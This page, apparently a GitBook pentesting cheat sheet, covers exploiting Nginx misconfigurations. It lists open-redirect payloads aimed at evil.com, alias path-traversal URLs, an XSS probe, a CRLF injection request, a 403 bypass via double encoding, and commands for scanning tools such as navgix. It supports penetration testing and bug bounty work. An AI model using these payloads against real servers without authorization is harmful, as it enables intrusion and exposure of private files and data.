Nginx

Nginx misconfiguration

Configuration file

GET /nginx.conf
GET /nginx/nginx.conf

Nginx configuration static analyzer

GitHub - yandex/gixy: Nginx configuration static analyzerGitHub

Open Redirect

https://example.com/%5cevil.com
https://example.com////\;@evil.com
https://example.com////evil.com
https://example.com///evil.com
https://example.com///evil.com/%2f%2e%2e
https://example.com///evil.com@//
https://example.com///{{RootURL}}evil.com/%2f%2e%2e
https://example.com//;@evil.com
https://example.com//\/evil.com/
https://example.com//\@evil.com
https://example.com//\evil.com
https://example.com//\tevil.com/
https://example.com//evil.com/%2F..
https://example.com//evil.com//
https://example.com//evil.com@//
https://example.com//evil.com\tevil.com/
https://example.com//https://evil.com@//
https://example.com/<>//evil.com
https://example.com/\/\/evil.com/
https://example.com/\/evil.com
https://example.com/\evil.com
https://example.com/evil.com
https://example.com/evil.com/%2F..
https://example.com/evil.com/
https://example.com/evil.com/..;/css
https://example.com/https:evil.com

Path traversal via misconfigured NGINX alias

Path traversal via misconfigured NGINX alias - Vulnerabilities - AcunetixAcunetix

https://example.com/static../ returns the same response as https://example.com/

https://example.com/folder1../folder1/folder2/static/main.css
https://example.com/folder1../%s/folder2/static/main.css
https://example.com/folder1/folder2../folder2/static/main.css
https://example.com/folder1/folder2../%s/static/main.css
https://example.com/folder1/folder2/static../static/main.css
https://example.com/folder1/folder2/static../%s/main.css

http://server/api/user -> http://apiserver/v1//user
http://server/apiuser -> http://apiserver/v1/user

NginxHackTricks

Tools

GitHub - hakaioffsec/navgix: navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilitiesGitHub

go get github.com/PuerkitoBio/goquery
go get github.com/cristalhq/acmd
go build


./navgix scan -u http://url.com

GitHub - shiblisec/Kyubi: A tool to discover and exploit Nginx alias traversal misconfiguration, the tool can bruteforce the URL path recursively to find out hidden files and directories.GitHub

Burp extension

GitHub - bayotop/off-by-slash: Burp extension to detect alias traversal via NGINX misconfiguration at scale.GitHub

SCRIPT_NAME

GET /index.php/<script>alert(1)</script>/index.php

Status page

https://example.com/nginx_status

CLRF

http://localhost/%0d%0aDetectify:%20clrf

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.19.3
Content-Type: text/html
Content-Length: 145
Connection: keep-alive
Location: https://example.com/
Detectify: clrf

Any variable

$ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’

Raw backend response reading

Send an invalid HTTP request, such as:

GET /? XTTP/1.1
Host: 127.0.0.1
Connection: close

We will get the following response:

XTTP/1.1 500 Error
Content-Type: text/html
Secret-Header: secret-info

Secret info, should not be visible!

merge_slashes

The merge_slashes directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so /// would become /. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it.

1. Detection

1. Exploit

NGINX may be protecting your applications from traversal attacks without you even knowingAppsFlyer Engineering

Tools

GitHub - stark0de/nginxpwner: Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.GitHub

GitHub - hakaioffsec/navgix: navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilitiesGitHub

./navgix scan -u http://vulnerable.com/                                     
[navgix 2024-12-23_02:12:17.731403583] starting scan on http://vulnerable.com/
[navgix 2024-12-23_02:12:17.830559043] Vulnerable: http://vulnerable.com/assets../
[navgix 2024-12-23_02:12:17.926859226] Vulnerable: http://vulnerable.com/assets../

GitHub - shiblisec/Kyubi: A tool to discover and exploit Nginx alias traversal misconfiguration, the tool can bruteforce the URL path recursively to find out hidden files and directories.GitHub

Reverse Proxy - 403 Bypass

Bypass 403 / 401

GET /api/internal/getAllUsers -> 403
GET /api/internal/getAllUserz -> 404
GET /api/internal/../getAllUsers -> 403
GET /api/internal/getAllUser%73 -> 403

GET /api/internal/getAllUser%2573 -> 200 WIN

%73 =s
%25873 =s

Source: https://www.youtube.com/watch?v=PXqlHAoF2wc

Web Cache Deception

Web Cache

Resources

Common Nginx misconfigurations - Blog DetectifyBlog Detectify

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.